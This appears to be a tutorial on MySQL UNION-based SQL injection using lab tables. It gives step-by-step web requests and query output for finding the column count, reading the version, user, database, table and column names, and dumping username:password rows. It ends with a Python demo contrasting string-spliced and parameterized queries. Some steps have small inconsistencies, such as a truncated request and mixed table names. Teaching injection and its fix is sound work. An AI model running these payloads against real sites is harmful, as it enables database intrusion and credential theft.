0x00 Overview

Use this technique when the page has a display position, i.e. at least one column of the query result is echoed back in the response, so the value selected into that column by the UNION becomes visible.

0x01 Test table data

  # Test table: test
  mysql> select * from test;
  +----+------+-----+---------+
  | id | test | map | content |
  +----+------+-----+---------+
  |  1 | 1    | 1   | 1       |
  |  2 | 2    | 2   | 2       |
  |  3 | 3    | 3   | 3       |
  +----+------+-----+---------+
  3 rows in set (0.00 sec)

  # Test admin table: users
  mysql> select * from users;
  +----+----------+------------+
  | id | username | password   |
  +----+----------+------------+
  |  1 | Dumb     | Dumb       |
  |  2 | Angelina | I-kill-you |
  |  3 | Dummy    | p@ssword   |
  |  4 | secure   | crappy     |
  |  5 | stupid   | stupidity  |
  |  6 | superman | genious    |
  |  7 | batman   | mob!le     |
  |  8 | admin    | admin      |
  |  9 | admin1   | admin1     |
  | 10 | admin2   | admin2     |
  | 11 | admin3   | admin3     |
  | 12 | dhakkan  | dumbo      |
  | 14 | admin4   | admin4     |
  +----+----------+------------+
  13 rows in set (0.00 sec)

0x02 Determining the number of columns

Web request: http://www.test.com/sql.php?id=1 order by 4

Database query: select * from test where id=1 order by 4

The largest N for which ORDER BY N still succeeds is the column count of the original query; the UNION SELECT below must supply exactly that many columns.

0x03 Extracting the database version

Web request: http://www.test.com/sql.php?id=-1 union select 1, @@VERSION, 3, 4

Database query: select * from test where id=-1 union select 1, @@VERSION, 3, 4

  mysql> select * from test where id=-1 union select 1, @@VERSION, 3, 4;
  +----+--------+------+---------+
  | id | test   | map  | content |
  +----+--------+------+---------+
  |  1 | 5.5.53 | 3    | 4       |
  +----+--------+------+---------+
  1 row in set (0.00 sec)

0x04 Extracting the current connection user

Web request: http://www.test.com/sql.php?id=-1 union select 1, user(), 3, 4

Database query: select * from test where id=-1 union select 1, user(), 3, 4;

  mysql> select * from test where id=-1 union select 1, user(), 3, 4;
  +----+----------------+------+---------+
  | id | test           | map  | content |
  +----+----------------+------+---------+
  |  1 | root@localhost | 3    | 4       |
  +----+----------------+------+---------+
  1 row in set (0.00 sec)

0x05 Extracting the current database

Web request: http://www.test.com/sql.php?id=-1 union select 1, database(), 3,

Database query: select * from test where id=-1 union select 1, database(), 3, 4;

  mysql> select * from test where id=-1 union select 1, database(), 3, 4;
  +----+------+------+---------+
  | id | test | map  | content |
  +----+------+------+---------+
  |  1 | test | 3    | 4       |
  +----+------+------+---------+
  1 row in set (0.00 sec)

0x06 Extracting database names

Note: changing the LIMIT offset returns a different database name.
For example:
offset 0 returns the 1st database
offset 1 returns the 2nd database

Web request: http://www.test.com/sql.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1

Database query: select * from test where id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1

  mysql> select * from test where id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1;
  +----+-------+------+---------+
  | id | test  | map  | content |
  +----+-------+------+---------+
  |  1 | 74cms | 3    | 4       |
  +----+-------+------+---------+
  1 row in set (0.00 sec)

0x07 Extracting table names

Note: changing table_schema=xxx to another database name lists that database's tables.
For example:
table_schema=database() lists the tables of the currently connected database
table_schema='test' lists the tables of the test database

Web request: http://www.test.com/sql.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=DATABASE() limit 0,1;

Database query: select * from test where id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=DATABASE() limit 0,1;

  mysql> select * from test where id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=DATABASE() limit 0,1;
  +----+-----------+------+---------+
  | id | test      | map  | content |
  +----+-----------+------+---------+
  |  1 | tdb_admin | 3    | 4       |
  +----+-----------+------+---------+
  1 row in set (0.00 sec)

0x08 Extracting column names

table_schema='xx' is the database whose columns are listed
table_name='xx' is the table whose columns are listed

The LIMIT offset selects which column is returned.
For example:
table tdb_admin has the columns id, username, password
limit 0 = id
limit 1 = username
limit 2 = password

Web request: http://www.test.com/sql.php?id=-1 union select 1,column_name,3,4 from information_schema.columns where table_schema=DATABASE() AND table_name='users' limit 1,1;

Database query: select * from test where id = -1 union select 1,column_name,3,4 from information_schema.columns where table_schema=DATABASE() AND table_name='users' limit 1,1;

  mysql> select * from test where id=-1 union select 1,column_name,3,4 from information_schema.columns where table_schema=DATABASE() AND table_name='tdb_admin' limit 1,1;
  mysql> select * from test where id = -1 union select 1,column_name,3,4 from information_schema.columns where table_schema=DATABASE() AND table_name='users' limit 1,1;
  +----+----------+-----+---------+
  | id | test     | map | content |
  +----+----------+-----+---------+
  |  1 | username | 3   | 4       |
  +----+----------+-----+---------+
  1 row in set (0.01 sec)

0x09 Extracting row contents

Note: the LIMIT offset selects which row is displayed.
limit 0 displays the first row
limit 1 displays the second row

Web request: http://www.test.com/sql.php?id=-1 union select 1,concat(0x7e,id,0x3a,username,0x3a,password,0x7e),3,4 from test.tdb_admin limit 0,1

Database query: select * from test where id=-1 union select 1,concat(0x7e,column1,0x3a,column2,0x3a,column3,0x7e),3,4 from dbname.tablename limit 0,1;

Here 0x7e is '~' and 0x3a is ':', so the concatenated values are returned as a single delimited string in the display position.

  mysql> select * from test where id=-1 union select 1,concat(0x7e,id,0x3a,username,0x3a,password,0x7e),3,4 from security.users limit 0,1;
  +----+---------------+-----+---------+
  | id | test          | map | content |
  +----+---------------+-----+---------+
  |  1 | ~1:Dumb:Dumb~ | 3   | 4       |
  +----+---------------+-----+---------+
  1 row in set (0.00 sec)
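As an added example (not code from the original page), the following shows why every step above works and how the fix closes it: a lookup that splices the id parameter into the query text, as the page's sql.php is assumed to do, beside the same lookup with a bound parameter. The tables are constructed SQLite copies of the page's test and users tables, and the 0x09 payload is adapted to SQLite syntax (|| instead of concat(), quoted '~' and ':' instead of 0x7e and 0x3a).

```python
import sqlite3

# Constructed in-memory stand-ins for the page's "test" and "users" tables
# (SQLite so the example runs offline; only the first two users are seeded).
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE test(id INTEGER, test TEXT, map TEXT, content TEXT);
        INSERT INTO test VALUES (1,'1','1','1'),(2,'2','2','2'),(3,'3','3','3');
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1,'Dumb','Dumb'),(2,'Angelina','I-kill-you');
    """)
    return db

def lookup_vulnerable(db, id_param):
    # Assumed shape of sql.php: the raw GET parameter becomes part of the
    # statement text, so everything after the number is parsed as SQL.
    return db.execute("SELECT * FROM test WHERE id=" + id_param).fetchall()

def lookup_safe(db, id_param):
    # Same query with a bound parameter: the value travels separately from
    # the statement and is compared as data, so it can never add a UNION.
    return db.execute("SELECT * FROM test WHERE id=?", (id_param,)).fetchall()

# The page's 0x09 payload in SQLite syntax: id=-1 empties the real result set
# and the UNION row lands in column 2, the "display position" of the page.
UNION_PAYLOAD = ("-1 union select 1, '~'||id||':'||username||':'||password||'~', 3, 4 "
                 "from users limit 0,1")

def demo():
    db = make_db()
    return {
        "vulnerable": lookup_vulnerable(db, UNION_PAYLOAD),  # [(1, '~1:Dumb:Dumb~', 3, 4)]
        "safe": lookup_safe(db, UNION_PAYLOAD),              # [] (no id equals that text)
        "safe_normal": lookup_safe(db, "1"),                 # [(1, '1', '1', '1')]
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```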